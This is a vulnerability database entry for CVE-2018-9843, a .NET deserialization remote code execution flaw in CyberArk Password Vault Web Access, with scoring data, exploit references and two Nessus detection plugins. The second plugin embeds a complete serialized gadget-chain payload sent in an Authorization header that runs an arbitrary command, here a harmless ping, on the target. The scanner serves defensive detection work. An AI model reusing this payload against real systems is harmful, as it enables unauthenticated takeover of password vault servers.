Vulnerabilities > CVE-2018-9843 - Deserialization of Untrusted Data vulnerability in Cyberark Password Vault 10.0
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
The REST API in CyberArk Password Vault Web Access before 9.9.5 and 10.x before 10.1 allows remote attackers to execute arbitrary code via a serialized .NET object in an Authorization HTTP header.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 2 |
Common Weakness Enumeration (CWE)
Exploit-Db
description | CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution. CVE-2018-9843. Webapps exploit for JSON platform |
file | exploits/json/webapps/44429.txt |
id | EDB-ID:44429 |
last seen | 2018-05-24 |
modified | 2018-04-09 |
platform | json |
port | |
published | 2018-04-09 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/44429/ |
title | CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution |
type | webapps |
Nessus
NASL family CGI abuses NASL id CYBERARK_PASSWORD_VAULT_9_9_5.NASL description The version of CyberArk Password Vault Web Access running on the remote host is prior to 9.9.5, 9.10.x prior to 9.10.1, or is version 10.1. It is, therefore, vulnerable to a remote code execution vulnerability. Note that Nessus has not tested for this issue but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 108952 published 2018-04-10 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/108952 title CyberArk Password Vault Web Access .NET Object Deserialization code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(108952); script_version("1.10"); script_cvs_date("Date: 2019/10/07 15:15:27"); script_cve_id("CVE-2018-9843"); script_bugtraq_id(105180); script_xref(name:"IAVB", value:"2018-B-0121"); script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization"); script_summary(english:"Looks for the product and version in the logon page."); script_set_attribute(attribute:"synopsis", value: "An Identity Management application running on the remote host is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The version of CyberArk Password Vault Web Access running on the remote host is prior to 9.9.5, 9.10.x prior to 9.10.1, or is version 10.1. It is, therefore, vulnerable to a remote code execution vulnerability. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. "); # https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64"); script_set_attribute(attribute:"solution", value: "Upgrade to CyberArk Password Vault 9.9.5, 9.10.1, 10.2 or Later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09"); script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/10"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("cyberark_password_vault_detection.nbin"); script_require_keys("Settings/ParanoidReport"); script_require_ports("Services/www", 80, 443); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("vcf.inc"); include("vcf_extras.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); port = get_http_port(default:80); app = vcf::get_app_info(app:"CyberArk Password Vault Web Access", webapp:TRUE, port:port); constraints = [ {"min_version" : "0.0.0", "fixed_version" : "9.9.5"}, {"min_version" : "9.10.0", "fixed_version" : "9.10.1"}, {"min_version" : "10.1", "fixed_version" : "10.2"} ]; vcf::check_version_and_report(app_info:app, constraints:constraints, severity:SECURITY_HOLE, strict:FALSE);
NASL family CGI abuses NASL id CYBERARK_PVWA_CVE-2018-9843.NASL description The CyberArk Password Vault Web Access running on the remote host is affected by a remote code execution vulnerability due to unsafe deserialization of an .NET object. An unauthenticated, remote attacker can exploit this, via a crafted a .NET object, to execute arbitrary .NET code in the context of the IIS server. last seen 2020-06-01 modified 2020-06-02 plugin id 110287 published 2018-06-01 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/110287 title CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(110287); script_version("1.5"); script_cvs_date("Date: 2019/10/07 15:15:27"); script_cve_id("CVE-2018-9843"); script_bugtraq_id(105180); script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check)"); script_summary(english:"Sends a .NET object to trigger an error message."); script_set_attribute(attribute:"synopsis", value: "An Identity Management application running on the remote host is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The CyberArk Password Vault Web Access running on the remote host is affected by a remote code execution vulnerability due to unsafe deserialization of an .NET object. An unauthenticated, remote attacker can exploit this, via a crafted a .NET object, to execute arbitrary .NET code in the context of the IIS server."); # https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64"); script_set_attribute(attribute:"solution", value: "Upgrade to CyberArk Password Vault Web Access 9.9.5, 9.10.1, 10.2 or Later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09"); script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/06/01"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("cyberark_password_vault_detection.nbin"); script_require_keys("installed_sw/CyberArk Password Vault Web Access"); script_require_ports("Services/www", 80, 443); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("install_func.inc"); app = 'CyberArk Password Vault Web Access'; # Plugin will exit if app is not detected on host get_install_count(app_name:app, exit_if_zero:TRUE); # Plugin will exit if app is not detected on this port port = get_http_port(default:80); install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:FALSE); url = "/PasswordVault/WebServices/PIMServices.svc/Applications/?Location=\&IncludeSublocations=true"; cmd = 'ping -n 3 localhost'; # vuln verification #cmd = 'dir > c:\\Windows\\Temp\\hacked.txt'; cmd = '/c ' + cmd; obj = raw_string( 0x00,0x01,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x01,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x0C,0x02,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56, 0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20, 0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C, 0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D, 0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39, 0x05,0x01,0x00,0x00,0x00,0x84,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F, 0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69, 0x63,0x2E,0x53,0x6F,0x72,0x74,0x65,0x64,0x53,0x65,0x74,0x60,0x31,0x5B,0x5B,0x53, 0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73, 0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D, 0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65, 0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63, 0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35, 0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x04,0x00,0x00,0x00,0x05, 0x43,0x6F,0x75,0x6E,0x74,0x08,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x07,0x56, 0x65,0x72,0x73,0x69,0x6F,0x6E,0x05,0x49,0x74,0x65,0x6D,0x73,0x00,0x03,0x00,0x06, 0x08,0x8D,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63, 0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F, 0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72, 0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E, 0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72, 0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75, 0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50, 0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37, 0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D, 0x08,0x02,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x09,0x03,0x00,0x00,0x00,0x02,0x00, 0x00,0x00,0x09,0x04,0x00,0x00,0x00,0x04,0x03,0x00,0x00,0x00,0x8D,0x01,0x53,0x79, 0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73, 0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x69, 0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x60,0x31,0x5B,0x5B,0x53, 0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73, 0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D, 0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65, 0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63, 0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35, 0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x01,0x00,0x00,0x00,0x0B, 0x5F,0x63,0x6F,0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x03,0x22,0x53,0x79,0x73, 0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69, 0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09, 0x05,0x00,0x00,0x00,0x11,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x06,0x06,0x00, 0x00) + mkword(strlen(cmd)) + cmd + raw_string( 0x06,0x07,0x00,0x00,0x00,0x03,0x63,0x6D, 0x64,0x04,0x05,0x00,0x00,0x00,0x22,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65, 0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74, 0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x03,0x00,0x00,0x00,0x08,0x44,0x65, 0x6C,0x65,0x67,0x61,0x74,0x65,0x07,0x6D,0x65,0x74,0x68,0x6F,0x64,0x30,0x07,0x6D, 0x65,0x74,0x68,0x6F,0x64,0x31,0x03,0x03,0x03,0x30,0x53,0x79,0x73,0x74,0x65,0x6D, 0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69, 0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,0x6C, 0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x2F,0x53,0x79,0x73,0x74,0x65, 0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D, 0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61, 0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2F,0x53,0x79,0x73,0x74,0x65, 0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D, 0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61, 0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,0x08,0x00,0x00,0x00,0x09, 0x09,0x00,0x00,0x00,0x09,0x0A,0x00,0x00,0x00,0x04,0x08,0x00,0x00,0x00,0x30,0x53, 0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65, 0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65, 0x72,0x2B,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x07, 0x00,0x00,0x00,0x04,0x74,0x79,0x70,0x65,0x08,0x61,0x73,0x73,0x65,0x6D,0x62,0x6C, 0x79,0x06,0x74,0x61,0x72,0x67,0x65,0x74,0x12,0x74,0x61,0x72,0x67,0x65,0x74,0x54, 0x79,0x70,0x65,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x0E,0x74,0x61,0x72,0x67, 0x65,0x74,0x54,0x79,0x70,0x65,0x4E,0x61,0x6D,0x65,0x0A,0x6D,0x65,0x74,0x68,0x6F, 0x64,0x4E,0x61,0x6D,0x65,0x0D,0x64,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E, 0x74,0x72,0x79,0x01,0x01,0x02,0x01,0x01,0x01,0x03,0x30,0x53,0x79,0x73,0x74,0x65, 0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C, 0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65, 0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x06,0x0B,0x00,0x00,0x00, 0xB0,0x02,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x46,0x75,0x6E,0x63,0x60,0x33,0x5B, 0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20, 0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F, 0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75, 0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C, 0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35, 0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79, 0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63, 0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34, 0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D, 0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B, 0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36, 0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,0x73,0x74,0x65, 0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72, 0x6F,0x63,0x65,0x73,0x73,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56, 0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20, 0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C, 0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D, 0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39, 0x5D,0x5D,0x06,0x0C,0x00,0x00,0x00,0x4B,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62, 0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E, 0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72, 0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B, 0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65, 0x30,0x38,0x39,0x0A,0x06,0x0D,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D, 0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E, 0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72, 0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B, 0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65, 0x30,0x38,0x39,0x06,0x0E,0x00,0x00,0x00,0x1A,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E, 0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63, 0x65,0x73,0x73,0x06,0x0F,0x00,0x00,0x00,0x05,0x53,0x74,0x61,0x72,0x74,0x09,0x10, 0x00,0x00,0x00,0x04,0x09,0x00,0x00,0x00,0x2F,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E, 0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,0x62,0x65, 0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69, 0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x07,0x00,0x00,0x00,0x04,0x4E,0x61,0x6D, 0x65,0x0C,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x4E,0x61,0x6D,0x65,0x09,0x43, 0x6C,0x61,0x73,0x73,0x4E,0x61,0x6D,0x65,0x09,0x53,0x69,0x67,0x6E,0x61,0x74,0x75, 0x72,0x65,0x0A,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,0x72,0x65,0x32,0x0A,0x4D,0x65, 0x6D,0x62,0x65,0x72,0x54,0x79,0x70,0x65,0x10,0x47,0x65,0x6E,0x65,0x72,0x69,0x63, 0x41,0x72,0x67,0x75,0x6D,0x65,0x6E,0x74,0x73,0x01,0x01,0x01,0x01,0x01,0x00,0x03, 0x08,0x0D,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x54,0x79,0x70,0x65,0x5B,0x5D,0x09, 0x0F,0x00,0x00,0x00,0x09,0x0D,0x00,0x00,0x00,0x09,0x0E,0x00,0x00,0x00,0x06,0x14, 0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E, 0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x53, 0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69, 0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E, 0x67,0x29,0x06,0x15,0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44, 0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65, 0x73,0x73,0x20,0x53,0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E, 0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53, 0x74,0x72,0x69,0x6E,0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x0A,0x00,0x00,0x00, 0x09,0x00,0x00,0x00,0x06,0x16,0x00,0x00,0x00,0x07,0x43,0x6F,0x6D,0x70,0x61,0x72, 0x65,0x09,0x0C,0x00,0x00,0x00,0x06,0x18,0x00,0x00,0x00,0x0D,0x53,0x79,0x73,0x74, 0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x06,0x19,0x00,0x00,0x00,0x2B,0x49, 0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73, 0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74, 0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x29,0x06,0x1A,0x00,0x00,0x00,0x32, 0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x49,0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D, 0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69, 0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E, 0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x10,0x00,0x00,0x00,0x08,0x00,0x00,0x00, 0x06,0x1B,0x00,0x00,0x00,0x71,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6D, 0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65, 0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C, 0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E, 0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75, 0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54, 0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33, 0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x09,0x0C,0x00,0x00,0x00,0x0A,0x09,0x0C,0x00, 0x00,0x00,0x09,0x18,0x00,0x00,0x00,0x09,0x16,0x00,0x00,0x00,0x0A,0x0B ); # PVWA can be slow to respond http_set_read_timeout(30); token = base64(str: obj); res = http_send_recv3( port : port, method : 'GET', item : url, add_headers : make_array('authorization', token), content_type: 'application/json', fetch404 : TRUE, exit_on_fail: TRUE ); if(isnull(res[2])) audit(AUDIT_RESP_NOT, port, 'a GET request: No data in the response body'); # # Patched: # 403 # {"ErrorCode":"CAWS00001E","ErrorMessage":"Connection to the Vault was terminated."} if (res[2] !~ "Unable to cast object of type.* to type 'CyberArk.Services.Web.SessionIdentifiers") { audit(AUDIT_INST_VER_NOT_VULN, app, install['version']); } # # Vulenrable: # 403 # {"ErrorCode":"CAWS00001E","ErrorMessage":"Error raised while trying to establish session using session token provided. Error: Unable to cast object of type 'System.Collections.Generic.SortedSet`1[System.String]' to type 'CyberArk.Services.Web.SessionIdentifiers'."} # report = '\nNessus was able to detect the .NET deserialization vulnerability by' + '\nsending a crafted .NET object.' + '\n'; security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
Packetstorm
data source | https://packetstormsecurity.com/files/download/147105/rt-sa-2017-014.txt |
id | PACKETSTORM:147105 |
last seen | 2018-04-10 |
published | 2018-04-09 |
reporter | redteam-pentesting.de |
source | https://packetstormsecurity.com/files/147105/CyberArk-Password-Vault-Web-Access-Remote-Code-Execution.html |
title | CyberArk Password Vault Web Access Remote Code Execution |
The Hacker News
id | THN:A7F528F861EE01F1A3D095D085EDB80F |
last seen | 2018-04-09 |
modified | 2018-04-09 |
published | 2018-04-09 |
reporter | Mohit Kumar |
source | https://thehackernews.com/2018/04/enterprise-password-vault.html |
title | Critical Code Execution Flaw Found in CyberArk Enterprise Password Vault |
References
- http://seclists.org/fulldisclosure/2018/Apr/18
- http://seclists.org/fulldisclosure/2018/Apr/18
- http://www.securityfocus.com/archive/1/541932/100/0/threaded
- http://www.securityfocus.com/archive/1/541932/100/0/threaded
- http://www.securitytracker.com/id/1040675
- http://www.securitytracker.com/id/1040675
- https://www.exploit-db.com/exploits/44429/
- https://www.exploit-db.com/exploits/44429/
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution